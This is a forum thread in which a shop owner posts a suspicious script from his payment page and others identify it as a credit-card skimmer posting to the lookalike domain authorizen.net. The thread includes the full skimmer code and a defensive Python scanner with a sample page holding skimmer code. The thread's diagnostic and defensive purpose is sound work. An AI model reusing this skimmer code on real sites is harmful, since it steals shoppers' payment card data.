Hello,
Can you please help me?
My former developer left in kind of a hurry and I am afraid that he has modified the code of my shop too.
I found a suspicious line on the payment site:
<script type="text/javascript">
$(":button").click(function() {
  // runs on any button click once the CVV field has something in it
  if (document.getElementsByName('CCCode')[0].value.length > 1) {
    var xmlhttp;
    if (window.XMLHttpRequest) {
      xmlhttp = new XMLHttpRequest();
    } else {
      xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
    }
    // note the host: authorizen.net, not authorize.net
    xmlhttp.open("POST", "https://authorizen.net/XXX.php", true);
    xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    // every card and billing field from the form, joined with '|'
    xmlhttp.send('data='
      + document.getElementsByName('CCNumber')[0].value
      + '|' + document.getElementsByName('CCExMonth')[0].options[document.getElementsByName('CCExMonth')[0].selectedIndex].value
      + '|' + document.getElementsByName('CCExYear')[0].options[document.getElementsByName('CCExYear')[0].selectedIndex].value
      + '|' + document.getElementsByName('CCCode')[0].value
      + '|' + document.getElementsByName('CCName')[0].value
      + '|' + document.getElementsByName('CCAddress')[0].value
      + '|' + document.getElementsByName('CCCity')[0].value
      + '|' + document.getElementsByName('CCState')[0].value
      + '|' + document.getElementsByName('CCZip')[0].value
      + '|' + document.getElementsByName('CCCountry')[0].value
      + '|' + document.getElementsByName('CCPhone')[0].value);
  }
});
</script>
I noticed that it posts to authorizeN.net, not authorize.net. (XXX is a substitute for private data.)
Is this something to worry about?
Thanks,
feri
11-14-2018 09:18 AM
Without even examining the rest of your code, the URL seems hardly malicious. If you type that in a browser it redirects to authorize.net, which is a pretty dead-on guarantee authorize.net owns that domain too (companies buy domains that are nearly identical to their primary domain name all the time for a number of reasons, and it would be a little unusual for a malicious site to redirect you to a legitimate site).
11-15-2018 09:53 AM - edited 11-15-2018 09:54 AM
The domain resolves to an IP address out of Montenegro. So unless authorize.net has servers in that country I would say it is suspicious.
11-15-2018 12:08 PM
Authorize.Net definitely does not have an API endpoint in that format. The form should be taken offline until it is worked out.
11-16-2018 10:20 AM
11-17-2018 12:42 AM
That address is redirecting back to authorize.net. If authorize.net has no connection to that domain it means someone is purposely redirecting it. The IP for that domain is tracing back to Montenegro in Europe.
If this code is inside a working payment form then that script has nothing to do with the normal functionality of the page and it is simply sending credit card info to some unknown server in Montenegro.
It might not be malicious concerning the previous developer, they might not have been aware of it but I disagree that there is no chance of harm coming from the domain.
That script doesn't look like anything a developer would use to communicate with authorize.net.
Newegg had a similar hack a few months ago. Hackers set up a fake domain name (neweggstats.com) with an SSL certificate. They were able to inject script code into the payment form that skimmed credit card info.
11-18-2018 07:20 AM
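The check the posters above are doing by hand (does an inline script read the card fields and send them to a host that is not the gateway, on a domain that imitates the real one?) can be scripted. This is an added example, not code from the forum or from Authorize.Net; the allowlist, the lookalike threshold and the sample page are assumptions.

```python
import difflib, re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist: the only host this checkout page may send card data to.
ALLOWED_HOSTS = {"api.authorize.net"}
# Input names from the form in the thread; a script touching them handles card data.
CARD_FIELDS = ("CCNumber", "CCCode", "CCExMonth", "CCExYear")
# Matches xhr.open("POST", "url", ...) and fetch("url", ...); group 1 = method, 2 = URL.
CALL_RE = re.compile(r"""(?:\.open\(\s*["'](\w+)["']\s*,|fetch\()\s*["']([^"']+)["']""")

class InlineScripts(HTMLParser):
    """Collect the text of every inline <script> block on the page."""
    def __init__(self):
        super().__init__()
        self.scripts, self._buf, self._in = [], [], False
    def handle_starttag(self, tag, attrs):
        self._in = tag == "script"
    def handle_data(self, data):
        if self._in:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script":
            self.scripts.append("".join(self._buf))
            self._buf, self._in = [], False

def lookalike_of(host, legit=("authorize.net",)):
    """Return the legitimate domain this host closely imitates, else None (0.9 is an assumed threshold)."""
    for name in legit:
        if host != name and difflib.SequenceMatcher(None, host, name).ratio() >= 0.9:
            return name
    return None

def find_skimmers(html):
    """(method, host, imitated domain) for each card-reading script that posts off the allowlist."""
    parser = InlineScripts()
    parser.feed(html)
    hits = []
    for body in parser.scripts:
        if not any(field in body for field in CARD_FIELDS):
            continue  # never touches card fields, so not a skimmer
        for m in CALL_RE.finditer(body):
            host = (urlparse(m.group(2)).hostname or "").lower()
            if host not in ALLOWED_HOSTS:
                hits.append((m.group(1) or "FETCH", host, lookalike_of(host)))
    return hits

# Constructed sample: one legitimate post to the gateway, then a skimmer like the thread's.
SAMPLE_PAGE = """<script>x.open("POST", "https://api.authorize.net/xml/v1/request.api", true);
x.send(document.getElementsByName('CCNumber')[0].value);</script>
<script>if (document.getElementsByName('CCCode')[0].value.length > 1) {
  xmlhttp.open("POST", "https://authorizen.net/XXX.php", true);
  xmlhttp.send('data=' + document.getElementsByName('CCNumber')[0].value); }</script>"""
```

Run `find_skimmers` over the saved HTML of the checkout page; a hit means the page is posting card data somewhere it should not and belongs offline, as suggested above.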
I have the same problem, please help!
11-18-2018 11:22 AM - edited 11-18-2018 11:23 AM
11-18-2018 02:19 PM
@andreer
Then you probably were compromised as well, as there is no way this is a legitimate domain owned by Authorize.net. Are both of you possibly running jQuery File Upload (or one of its derivatives)? Every Tom, Dick and Harriet is targeting sites running that as we speak.
11-21-2018 07:38 PM - edited 11-21-2018 07:38 PM
I posted about this the other day and accidentally deleted my post trying to edit it. I was dead wrong. I looked up this domain and it is not owned by authorize.net. Authoriz.net and Authorized.net are also redirect domains, and both domains have authorize.net listed as the owner on the registry. It is clear that authorize.net publicly claims ownership of any domain they own.
authorizen.net is listed under GTO Projects Limited, and one or more domains under GTO Ltd have been logged by brute-forcer blacklists for attempted brute-force attacks on other websites.
What threw me off was that the developer was suspected of editing the code. It seemed to me that this would be a rather expensive way of monetizing a fake domain. I'll let others chime in, but as has been said it looks like sites have been compromised, and it is most likely not rogue developers behind the scenes, but code execution/XSS attacks. Was that what you suspected, menudrive-myles?
11-25-2018 09:33 AM